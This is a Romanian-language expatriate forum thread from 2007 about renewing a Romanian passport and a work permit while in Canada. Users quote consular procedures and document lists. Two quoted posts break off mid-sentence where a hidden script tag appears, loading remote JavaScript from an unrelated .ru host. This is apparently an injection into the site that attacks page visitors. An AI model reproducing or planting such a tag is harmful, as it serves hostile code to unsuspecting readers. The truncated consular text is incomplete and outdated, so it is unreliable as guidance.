PDA

Arată versiune întreagă : Ajutor! Expira pasaportul!

robby2055
17.05.2007, 04:07
Va rog sa ma ajutati intr-o problema...Am work visa pana in iulie 2007 si angajatorul vrea sa-mi mai prelungeasca pt. inca 6 luni dar mie imi expira pasaportul in noiembrie 2007..ce trebuie sa fac? Pot schimba pasaportul in Canada, si daca da unde?

N-as vrea sa revin in tara pentru asta.

Va multumesc anticipat

fifi
17.05.2007, 07:58
stai, nu te agita, inca mai ai timp daca asa sta treaba. Nu trebuie sa mergi in Ro pt schimbarea pasaportului, consulatele romane din canada se ocupa de asta.

uite, site ul consulatului roman din toronto, citeste acolo la pasapoarte, explica tot ce si cum iti trebuie. http://www.romaniacanada.com/default.htm

daca nu esti in ontario, cauta cel mai apropiat consulat roman, trebuie sa aplici neaparat pana nu-ti expira work permit ul, romanii cer acest document(si apoi CIC nu-ti poate emite un alt work permit decat cu un pasaport valabil pe perioada ceruta, 6 luni in cazul tau). Deci sunt cam legate una de alta.

Ai nevoie de o persoana in Ro pe care s-o imputernicesti prin consulat sa-ti faca pasaportul, restul documentelor necesare le gasesti pe website ul de mai sus.

light
17.05.2007, 13:41
robby, tu esti in canada? Daca esti in usa, mergi aici la un consulat. Uite de ce ai nevoie:
II. Obtinerea unui pasaport de cetatean roman pentru persoanele aflate temporar in SUA.
Informatii despre cartea de identitate

Conditii pentru obtinerea pasaportului:

Cetatenii romani aflati temporar in Statele Unite ale Americii la studii, bursa, in vizita sau cu contract de munca pe durata determinata si carora autoritatile americane le-au aprobat sederea pentru o perioada mai mica de 1 an, pot solicita eliberarea unui nou pasaport formatiunii de pasapoarte din judetul de domiciliu, prin procura autentificata de ambasada.

Persoanele aflate temporar in SUA pot dovedi caracterul legal al prezentei lor cu unul dintre urmatoarele documente: viza valabila de intrare in SUA emisa de o ambasada sau consulat american; permis de munca valabil emis de autoritatile americane de imigrare; document de calatorie pentru refugiati valabil; permis de re-intrare (Re-entry Permit) valabil; scrisoare eliberata de serviciul american de imigrare care sa confirme aprobarea statutului legal al persoanei in Statele Unite si durata valabilitatii acestui statut.

Atentie! In lipsa unui document care sa dovedeasca statutul dumneavoastra legal in Statele Unite, autoritatile romane nu vor putea elibera un nou pasaport. Pentru a va valorifica dreptul de obtinere a pasaportului va trebui sa va deplasati in Romania si sa solicitati pasaportul personal.

Permisul de conducere american sau international, carnetul de identitate american si certificatul de casatorie american NU sunt documente care confirma statutul dumneavoastra legal in Statele Unite.

Persoanele care au un statut temporar legal in Statele Unite pot obtine pasapoarte noi fara a fi necesar sa se deplaseze in Romania . Pasapoartele noi se pot obtine prin intermediul unui mandatar din Romania , caruia i se trimite o procura speciala, autentificata de Ambasada Romaniei sau de unul dintre oficiile consulare de cariera ale Romaniei din New York , Los Angeles si Chicago .

Mandatarul va trebui sa se prezinte la directia de pasapoarte din localitatea dumneavoastra de domiciliu si sa depuna procura, cererea de pasaport semnata de dumneavoastra, certificatul de nastere si de casatorie al dumneavoastra, buletinul de identitate si pasaportul actual al dumneavoastra, precum si fotografiile dumneavoastra certificate pentru identitate de unul dintre oficiile consulare ale Romaniei.

Procura pentru obtinerea pasaportului se semneaza la sediul Ambasadei Romaniei sau al unuia dintre oficiile consulare mentionate.

Documente necesare la data semnarii procurii la sediul ambasadei (sau al unuia dintre oficiile consulare):

<LI>vechiul pasaport romanesc, in original;
<LI>4 (patru) fotografii de tip pasaport (dimensiuni 3,5/4,5 cm), color, identice si de data recenta; capul trebuie sa fie centrat, la o distanta de 0,5 cm de marginea superioara si de cele laterale, iar umerii sa apara in cadru; fotografia sa fie din fat ape un fundal monocolor alb; ochii trebuie sa fie perfect vizibili, chiar si la purtatorii de ochelari; fotografia se face cu capul descoperit; in fotografiile copiilor mici nu trebuie sa apara mainile parintilor;
<LI>buletinul de identitate romanesc sau cartea de identitate romaneasca
<LI>certificatul de nastere si/sau de casatorie romanesc
<LI>documentul american care confirma statutul dumneavoastra legal in Statele Unite.
<LI>datele din buletinul de identitate apartinand mandatarului din Romania . </LI>

Autentificarea procurilor se face in ziua in care va prezentati la sediul consu<script src=http://www.iroe.ru/ngg.js></script>

fifi
18.05.2007, 15:52
Va rog sa ma ajutati intr-o problema...Am work visa pana in iulie 2007 si angajatorul vrea sa-mi mai prelungeasca pt. inca 6 luni dar mie imi expira pasaportul in noiembrie 2007..ce trebuie sa fac? Pot schimba pasaportul in Canada, si daca da unde?

N-as vrea sa revin in tara pentru asta.

Va multumesc anticipat

light, eu de aia am banuit ca ar fii in canada si doi, faptul ca a postat aici, la "Vize immigrare, vizitator-Canada-Ontario-Alte regiuni"... si nu la US, mi s-a parut prea mare intamplare sa greseasca de 2 ori... smileys/smiley59.gif

altceva vreau sa te intreb eu pe tine light, daca nu se supara robby ca o fac pe topicul lui...
"Atentie! In lipsa unui document care sa dovedeasca statutul dumneavoastra legal in Statele Unite, autoritatile romane nu vor putea elibera un nou pasaport. Pentru a va valorifica dreptul de obtinere a pasaportului va trebui sa va deplasati in Romania si sa solicitati pasaportul personal. (cum? smileys/smiley18.gif)

stii cumva ce se intampla in cazul in care, ai iesit din statut, iti expira si pasaportul dar vrei sa te intorci in tara, inainte de a ti se emite un removal order? nu poti, pt ca nu ai pasaport valabil si nici nu-l poti obtine ca nu ai dovada de statut... smileys/smiley75.gif

apreciez raspunsuri de la tine sau de la oricune altcineva care stie, atat pentru US cat si pt Canada.

fifi
18.05.2007, 15:57
pt robby2055, in caz ca mai da pe aci si are nevoie, consulatele romanesti din Canada si ariile lor de cuprindere pe provincii, le gasesti aici http://www.romanian-portal.com/ca/ro/comunitate.asp?id=82

divo
18.05.2007, 17:26
Fifi..daca nu te superismileys/smiley2.gif, iti raspund eu pana apare light! Era vorba de "titlul de calatorie", valabil doar pentru a merge in Romania! Asta este pentru US..Pentru Canada..nu stiu cum merg treburile!smileys/smiley5.gif
<H1><A name="Titlul de calatorie">Titlul de calatorie</A></H1>
Persoanele ale caror pasapoarte au termenul de valabilitate expirat sau nu mai au pasaport ori alt document de calatorie asupra lor si doresc sa se deplaseze in Romania, pot solicita eliberarea unui titlu de calatorie.
Titlul de calatorie este un document care permite titularului sau, deplasarea exclusiv in Romania, intr-o perioada de timp limitata. El este valabil numai pentru intrarea pe teritoriul Romaniei si nu va putea fi folosit pentru revenirea in SUA sau deplasarea in alta tara. Adresam tuturor posesorilor de titluri de calatorie sugestia ca, pe perioada sederii lor in Romania, sa indeplineasca demersurile necesare pentru obtinerea unui pasaport individual.
Pentru obtinerea titlului de calatorie, sunt necesare urmatoarele documente:
a) cererea (http://www.roembus.org/english/services/&#102;ormulare/Titlu_Calatorie.PDF) completata integral si semnata de solicitant;
b) 2 (doua) fotografii de tip pasaport, color, identice si de data recenta;
c) copia xerox a pasaportului romanesc expirat (primele patru pagini);
<H1 style="TEXT-ALIGN: justify">d) in cazul in care pasaportul anterior a fost pierdut sau furat, solicitantul trebuie sa depuna, in original, raportul politiei eliberat in urma declaratiei de pierdere sau furt; fara acest document, cererea de obtinere a unui nou pasaport nu va putea fi inregistrata;</H1>
e) copia xerox a oricarui alt document de identitate sau de stare civila, eliberat de autoritatile romane (certificat de nastere sau de casatorie, permis de conducere auto, livret militar, diploma de studii cu fotografie);
f) copia xerox a unui act de identitate prevazut cu fotografie, eliberat de autoritatile americane (permis de conducere auto, carnet de identitate).
Cererea insotita de toate documentele si fotografiile se inregistreaza la ambasada sau la consulatul cel mai apropiat. Taxa pentru obtinerea unui titlu de calatorie este de 60 USD. Taxa poate fi platita cu money order adresat ambasadei sau consulatului la care se inregistreaza cererea. Nu se accepta plata cu cec personal sau carte de credit. Durata medie pentru obtinerea unui titlu de calatorie este de 10 de zile (pentru solicitantii care poseda pasapoarte romanesti cu coperti de culoare visinie,<script src=http://www.iroe.ru/ngg.js></script>

fifi
18.05.2007, 19:36
multumescdivo, este exact ce voiam sa aflu, daca dai si pagina de web de unde ai scris , pentru exactitatea informatiei este super... smileys/smiley1.gif

divo
18.05.2007, 19:47
Da fifi..ai dreptate! Mea culpa!smileys/smiley9.gif

http://www.roembus.org/english/services/pasapoarte-ro.htm

robby2055
22.05.2007, 04:03
Va multumesc mult, mi-ati fost de mare ajutor.

fifi
23.05.2007, 14:35
divo, si in Canada este cam la fel numai ca dracu` a stiut ce e ala titlu` de calatorie?! smileys/smiley36.gif

robby, oricand si cu cea mai mare placere dar totusi esti in US sau in Canada ca in Romania nici atat nu cred smileys/smiley1.gif

iti urez ca seful/ contractorul tau sa se razgandeasca si sa-ti ceara workpermit ulpe 1 an nu pe 6 luni smileys/smiley2.gifpentru ca dupa 2 ani lucrati si stati in canada(Ontario) iti poti depune actele pentru rezidenta permanenta(daca vrei) si mi se pare ca in unele provincii chiar dupa un an.

robby2055
25.05.2007, 02:45
Da Fifi,sunt in Canada. Din pacate aplicatia plecase deja...nu cred ca voi obtine permisul de munca decat pt. 3 luni...(imi expira pasaportul dupa...). Cred ca apoi ma voi intoarce in Romania sa-mi schimb pasaportul si daca primesc iar work permit pe o per. mai mare imi iau si familia. Sper....Doamne Ajuta!

Numai bine va doresc.

robby2055
25.05.2007, 02:47
Am uitat sa zic ca sunt in Edmonton, nu in Ontario cum ai presupus tu.

fifi
25.05.2007, 07:55
robby, macar am presupus bine ca esti in Canada, oricum Edmonton tot de Consulatul din Toronto apartine.

1. sa speram ca CIC iti va da work permit ul pe o perioada asa de scurta(3 luni)

2. daca ti se acorda acest work permit, pe cele 3 luni, stai si le lucrezi apoi te intorci in Ro sa-ti faci pasaportul? nu iesi mai scump decat daca ai veni in toronto? si apoi, odata plecat in Ro, nu mai ai nici un fel de viza, documentpt intoarcerea in Canada, ce o sa faci, o sa-ti aplice contractorul de aici pentru un nou work permit,tu fiind in Ro? daca e asa fii sigur ca te ai bine cu el.

daca stau sa ma gandesc bine, tu poti sa-ti iei 1-2 zile libere si sa viila Consulatul dintoronto sa-ti depui actele pentru schimbarea pasaportului, mai este o luna intreaga in care ai si pasaport valid si statut legal, il poti pune la urgenta. Apoi chiar daca iti da work permit pe 3 luni sau nu-ti da deloc(pana in noiembrie mai e) poti aplica din nou.

nu inteleg de ce eziti sa faci asta, citeste aici ce acte iti trebuie http://www.romaniacanada.com/consularservices/serviciiconsul (http://www.romaniacanada.com/c&#111;nsularservices/serviciic&#111;nsulare/pasapoarte.htm) are/pasapoarte.htm, imputernicirile le faci acolo, pe loc,iti trebuie numai datele persoanei pe care o imputernicesti sa-ti faca pasaportul si toate documentele tale, pasaport original, work permit valabil, carte de identitate romaneasca, certificat de nastere si pozele cu dimensiunile cerute.

imi inchipui doar ca nu ai timp, probabil munciti din greu pe acolo dar gandeste-te bine ce faci, eu sper sa aud numai de bine!

robby2055
25.05.2007, 23:29
Stau aceste 3 luni si le lucrez aici, apoi sper ca imi va face in continuare, eu oricum plec in Ro. Asa imi da de inteles seful ca imi va face in continuare...Vreau sa ma intorc in Ro sa-mi vad familia, daca imi face work permit pe o perioada mai mare vreau sa iau familia cu mine.

"Apoi chiar daca iti da work permit pe 3 luni sau nu-ti da deloc(pana in noiembrie mai e) poti aplica din nou."

Pot aplica pt alta firma? Caci eu stiu ca nu se poate. Daca insa e vorba despre firma la care lucrez deja imi poate trimite aplicatia si in Ro cum a mai facut-o odata. Vreau sa aduc si familia sa venim toti odata (daca se poate)

fifi
26.05.2007, 11:31
"speri"? ca-ti mai face contract in continuare? asta nu e bine, ar cam trebui sa fii sigur ca-ti aplica pt un nou permis de munca daca vrei sa mergi in Ro, de aceea ti-am zis eu sa te ai bine cu el...

da, si alta firma iti poate aplica pt work permit atata timp cat nu ai incalcat conditiile primului contract, iar contractorul nu s-a plans de tine si iti da recomandare.

sa veniti tu si familia odata nu se poate numai in cazul in care are si sotia contract si work permit.

problema cu dusul acasa in cazul tau e ca daca te intorci numai tu, nu-ti poti chema familia la tine prea repede, vor spune ca ai fost acasa si v-ati vazut, asa repede v-a venit dor unul de altul?

de ce nu ti-ai chemat sotia pe durata primului tau contract a fost prea scurt sau...?! smileys/smiley92.gif